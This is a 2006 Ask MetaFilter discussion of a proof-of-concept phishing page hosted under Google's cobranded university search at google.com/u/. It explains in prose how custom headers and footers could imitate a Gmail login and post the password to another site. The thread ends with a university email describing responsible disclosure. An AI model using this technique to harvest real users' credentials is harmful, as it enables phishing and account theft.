Google exploit
September 15, 2006 3:52 AM Subscribe
Can someone explain to me what this: http://www.google.com/u/gplus is all about? How is it done? Hint: you may not want to enter your real Google login details into the form.
This popped up on del.icio.us today. I'm trying to work out how someone scored a google.com/* address to run fake password-grabbing login page on. What's the trick?
This popped up on del.icio.us today. I'm trying to work out how someone scored a google.com/* address to run fake password-grabbing login page on. What's the trick?
Response by poster: Well, because I doubt it's official Google corporate policy to set up a page claiming to be offering a "Limited Beta of Gmail Plus!" that sends you off to a remote domain that tells you the password you typed in.
posted by Jimbob at 4:23 AM on September 15, 2006
posted by Jimbob at 4:23 AM on September 15, 2006
Ah, ok. I entered jimbob/wtf for the username/pwd, and got back
posted by gleuschk at 4:26 AM on September 15, 2006
You (could have) gotten served!The URL in the address bar is http://www.monthsbehind.net/google.php
jimbob = username you entered
wtf = password you entered
No data was actually taken, just displayed to you :) This is just a proof of concept of what a malicious user could do with this exploit.
posted by gleuschk at 4:26 AM on September 15, 2006
So to repeat JBs question, wtf is going on?
posted by wilful at 4:34 AM on September 15, 2006 [1 favorite]
posted by wilful at 4:34 AM on September 15, 2006 [1 favorite]
That is really bizarre. It is not character spoofing because the trick still workes if one types the URL into the address bar. The monthsbehind.com root directory is not helpful at all. Is this a prank by an internal Google employee?
posted by pheideaux at 4:39 AM on September 15, 2006
posted by pheideaux at 4:39 AM on September 15, 2006
Usually in situations like this, I blame the interns.
posted by jessamyn at 4:43 AM on September 15, 2006 [1 favorite]
posted by jessamyn at 4:43 AM on September 15, 2006 [1 favorite]
You can see the same effect with other pages under the u directory like this: Electronic visualization lab. This page Cobranded University Search seems to shed some light on to it. It's their university offering.
posted by jessamyn at 4:46 AM on September 15, 2006
posted by jessamyn at 4:46 AM on September 15, 2006
Right, ucdavis.edu is mentioned in the source of the dodgy page.
posted by edd at 4:50 AM on September 15, 2006
posted by edd at 4:50 AM on September 15, 2006
The google /u/ pages are custom search pages for various organizations, especially universities and schools:
Google's own example.
The schools have total control over the content of those pages, so they can easily perform a hack like the gmailplus one. I'm glad someone demonstrated this exploit.
posted by jedrek at 4:52 AM on September 15, 2006
Google's own example.
The schools have total control over the content of those pages, so they can easily perform a hack like the gmailplus one. I'm glad someone demonstrated this exploit.
posted by jedrek at 4:52 AM on September 15, 2006
More here, here here and description of other schools in the program here, though gplus is not on the list.
posted by jessamyn at 4:52 AM on September 15, 2006
posted by jessamyn at 4:52 AM on September 15, 2006
I'm not sure exactly what's going on here, and I suspect Google will take it down shortly.
Basically: google.com/u contains various legit Google pages.
For example, try /blah, /test or /2. The /test one mentions cobranded university search. Perhaps a mischevious university employee has access to upload a page to /gplus?
posted by matthewr at 4:55 AM on September 15, 2006
Basically: google.com/u contains various legit Google pages.
For example, try /blah, /test or /2. The /test one mentions cobranded university search. Perhaps a mischevious university employee has access to upload a page to /gplus?
posted by matthewr at 4:55 AM on September 15, 2006
Whoa, I need to refresh more often and use preview.
posted by matthewr at 4:55 AM on September 15, 2006
posted by matthewr at 4:55 AM on September 15, 2006
I sent an email to the guy who has the monthsbehind domain registered to let him know that the link to that page is now out in the wild. His info is easy to find on whois, so this was probably some sort of example page and not an intentional nefarious hack.
posted by jessamyn at 5:03 AM on September 15, 2006
posted by jessamyn at 5:03 AM on September 15, 2006
Response by poster: I send an email to the guy who has the domain registered to let him know that the link to that page is now out in the wild.
Heh, I wanted answers not action..! I guess this was all a lot simpler than I thought...
posted by Jimbob at 5:04 AM on September 15, 2006
Heh, I wanted answers not action..! I guess this was all a lot simpler than I thought...
posted by Jimbob at 5:04 AM on September 15, 2006
Best answer: Here's a link to the guy who uncovered it as a potential phishing loophole.
posted by peacay at 5:07 AM on September 15, 2006
posted by peacay at 5:07 AM on September 15, 2006
Response by poster: Ah ha, now I get it, thanks to Peacay.
Google offers a service for universities to "brand" Google search by specifying their own header and footer.
This makes it possible, if you get onto that service, to insert a "header" and "footer" that makes the page look like a Gmail login, giving you your own google.com URL with a password form that can send the data to whatever site you like.
And they would have got away with it, too, if it wasn't for us darned kids!
posted by Jimbob at 5:14 AM on September 15, 2006
Google offers a service for universities to "brand" Google search by specifying their own header and footer.
This makes it possible, if you get onto that service, to insert a "header" and "footer" that makes the page look like a Gmail login, giving you your own google.com URL with a password form that can send the data to whatever site you like.
And they would have got away with it, too, if it wasn't for us darned kids!
posted by Jimbob at 5:14 AM on September 15, 2006
Firefox 2 considers that link to be a phishing attempt.
posted by Coda at 5:56 PM on September 15, 2006
posted by Coda at 5:56 PM on September 15, 2006
Yeah, I get a pop up warning me not to use the page at all. <3 Firefox.
posted by Salmonberry at 2:16 PM on September 16, 2006
posted by Salmonberry at 2:16 PM on September 16, 2006
I got an email back from the UC Davis people:
Dear Ms. West
We appreciate your concern and you taking the time to contact us.
One of our programming students, Eric Farraro, discovered a security issue
for Google, on their military and university local search engine software,
which actually creates a security risk to Google servers and not the
military/university site.
He ran a legitimate test site to prove his point, under the guidance of his
supervisor, Charlie Turner. When he had proof, he contacted Google, who
immediately took down the specific functionality while they fix the bug.
(It is still down). Eric's site did not actually do any "phishing" - it
strictly returned the information to the person originating the login, to
let them know that had it been a real phishing site, their information would
have been taken and used without their knowledge.
His discovery will certainly save millions from a potentially huge
"phishing" exploit, as any phishing done using this security breach would be
using google's name as a "www.google.com/u/[put whatever you want here] URL
- which of course would be considered a trusted source by many.
Therefore, rest assured that this site was created with both the knowledge
of his supervisor and now of Google - who is working to correct the security
breach that Eric discovered.
Once again, thank-you very much for your inquiry.
Sincerely
Liz Gibson
posted by jessamyn at 7:13 PM on September 17, 2006
Dear Ms. West
We appreciate your concern and you taking the time to contact us.
One of our programming students, Eric Farraro, discovered a security issue
for Google, on their military and university local search engine software,
which actually creates a security risk to Google servers and not the
military/university site.
He ran a legitimate test site to prove his point, under the guidance of his
supervisor, Charlie Turner. When he had proof, he contacted Google, who
immediately took down the specific functionality while they fix the bug.
(It is still down). Eric's site did not actually do any "phishing" - it
strictly returned the information to the person originating the login, to
let them know that had it been a real phishing site, their information would
have been taken and used without their knowledge.
His discovery will certainly save millions from a potentially huge
"phishing" exploit, as any phishing done using this security breach would be
using google's name as a "www.google.com/u/[put whatever you want here] URL
- which of course would be considered a trusted source by many.
Therefore, rest assured that this site was created with both the knowledge
of his supervisor and now of Google - who is working to correct the security
breach that Eric discovered.
Once again, thank-you very much for your inquiry.
Sincerely
Liz Gibson
posted by jessamyn at 7:13 PM on September 17, 2006
« Older Why can't I get me some cheapy electronics in... | What career path should I choose? Newer »
This thread is closed to new comments.
posted by gleuschk at 4:21 AM on September 15, 2006